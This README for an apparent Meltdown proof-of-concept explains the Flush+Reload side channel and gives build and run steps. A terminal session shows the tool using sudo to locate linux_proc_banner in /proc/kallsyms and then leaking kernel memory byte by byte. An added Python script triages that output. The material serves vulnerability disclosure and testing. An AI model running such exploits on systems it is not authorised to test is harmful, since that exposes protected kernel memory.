Describe Meltdown-Spectre/POC3 here.
# MELTDOWN EXPLOIT POC

Speculative optimizations execute code in a non-secure manner, leaving data traces in microarchitectural state such as the cache. Refer to the paper by Lipp et al. (2017) for details: https://meltdownattack.com/meltdown.pdf.

Can only dump `linux_proc_banner` at the moment, since the technique requires the accessed memory to be in the cache, and `linux_proc_banner` is cached on every read from `/proc/version`. Might work with `prefetch`.

Build with `make`, run with `./run.sh`. Can't defeat KASLR yet, so you may need to enter your password to find `linux_proc_banner` in `/proc/kallsyms` (or do it manually).

The Flush+Reload and target-array approach is taken from the Spectre paper https://spectreattack.com/spectre.pdf, implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

Pandora's box is open.
```
tmaeno@u16:~/Desktop/meltdown-exploit-master$ make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
cc meltdown.o -o meltdown
tmaeno@u16:~/Desktop/meltdown-exploit-master$ ls
Makefile  meltdown  meltdown.c  meltdown.o  README.md  run.sh
tmaeno@u16:~/Desktop/meltdown-exploit-master$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo sed -n -E s/^(f[0-9a-f]+) .* linux_proc_banner$/\1/p /proc/kallsyms
[sudo] password for tmaeno:
+ linux_proc_banner=ffffffff81a00060
+ set +x
cached = 39, uncached = 228, threshold 94
read ffffffff81a00060 = 25 % (score=286/1000)
read ffffffff81a00061 = 73 s (score=285/1000)
read ffffffff81a00062 = 20   (score=403/1000)
read ffffffff81a00063 = 76 v (score=360/1000)
read ffffffff81a00064 = 65 e (score=654/1000)
read ffffffff81a00065 = 72 r (score=266/1000)
read ffffffff81a00066 = 73 s (score=458/1000)
read ffffffff81a00067 = 69 i (score=678/1000)
read ffffffff81a00068 = 6f o (score=379/1000)
read ffffffff81a00069 = 6e n (score=205/1000)
read ffffffff81a0006a = 20   (score=415/1000)
read ffffffff81a0006b = 25 % (score=385/1000)
read ffffffff81a0006c = 73 s (score=253/1000)
read ffffffff81a0006d = 20   (score=480/1000)
read ffffffff81a0006e = 28 ( (score=604/1000)
read ffffffff81a0006f = 62 b (score=336/1000)
VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19
VULNERABLE ON 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 42
model name      : Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz
stepping        : 7
microcode       : 0x26
cpu MHz         : 3399.949
cache size      : 6144 KB
physical id     : 0
```
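As an added example (not part of the original repository), a small Python triage script for the `run.sh` output format shown above: it parses the calibration line and the per-byte `read ... (score=...)` lines, checks that the Flush+Reload threshold actually separates the cached and uncached latencies, and compares the recovered bytes against the known start of `linux_proc_banner` before reporting the host as vulnerable. The sample output is constructed from the session above; the 0.2 score floor is an assumed triage threshold, not a value from the tool.

```python
import re

# Constructed sample in the shape of the run.sh output above (first 8 leaked bytes).
SAMPLE_OUTPUT = """\
cached = 39, uncached = 228, threshold 94
read ffffffff81a00060 = 25 % (score=286/1000)
read ffffffff81a00061 = 73 s (score=285/1000)
read ffffffff81a00062 = 20   (score=403/1000)
read ffffffff81a00063 = 76 v (score=360/1000)
read ffffffff81a00064 = 65 e (score=654/1000)
read ffffffff81a00065 = 72 r (score=266/1000)
read ffffffff81a00066 = 73 s (score=458/1000)
read ffffffff81a00067 = 69 i (score=678/1000)
"""
# linux_proc_banner (init/version.c) starts with this format string, so a genuine
# leak of kernel memory must reproduce it byte for byte.
EXPECTED_PREFIX = b"%s version %s ("
READ_RE = re.compile(r"^read\s+([0-9a-f]+)\s*=\s*([0-9a-f]{2})\b.*\(score=(\d+)/(\d+)\)")
CAL_RE = re.compile(r"^cached\s*=\s*(\d+),\s*uncached\s*=\s*(\d+),\s*threshold\s*(\d+)")

def parse_run_output(text):
    """Return (calibration dict or None, [(addr, byte, score, trials), ...])."""
    calibration, reads = None, []
    for line in text.splitlines():
        if m := CAL_RE.match(line):
            cached, uncached, threshold = map(int, m.groups())
            calibration = {"cached": cached, "uncached": uncached, "threshold": threshold}
        elif m := READ_RE.match(line):
            addr, byte, score, trials = m.groups()
            reads.append((int(addr, 16), int(byte, 16), int(score), int(trials)))
    return calibration, reads

def assess(text, expected=EXPECTED_PREFIX, min_score=0.2):
    """Triage one run: threshold must lie between cached/uncached latencies, every byte
    must have won at least min_score of the trials, addresses must be contiguous and
    the bytes must match the known banner prefix; only then report VULNERABLE."""
    calibration, reads = parse_run_output(text)
    cal_ok = calibration is not None and \
        calibration["cached"] < calibration["threshold"] < calibration["uncached"]
    leaked = bytes(b for _, b, _, _ in reads)              # the bytes the POC guessed
    n = min(len(leaked), len(expected))                    # how many we can check
    matched = sum(leaked[i] == expected[i] for i in range(n))
    confident = all(s / t >= min_score for _, _, s, t in reads)
    contiguous = all(a + 1 == b for (a, *_), (b, *_) in zip(reads, reads[1:]))
    vulnerable = bool(reads) and cal_ok and matched == n and confident and contiguous
    return {"calibration_ok": cal_ok, "leaked": leaked, "matched_bytes": matched,
            "checked_bytes": n, "vulnerable": vulnerable}
```

A run whose bytes do not reproduce the banner prefix, or whose threshold falls outside the calibrated latencies, is reported as not vulnerable rather than as a partial leak.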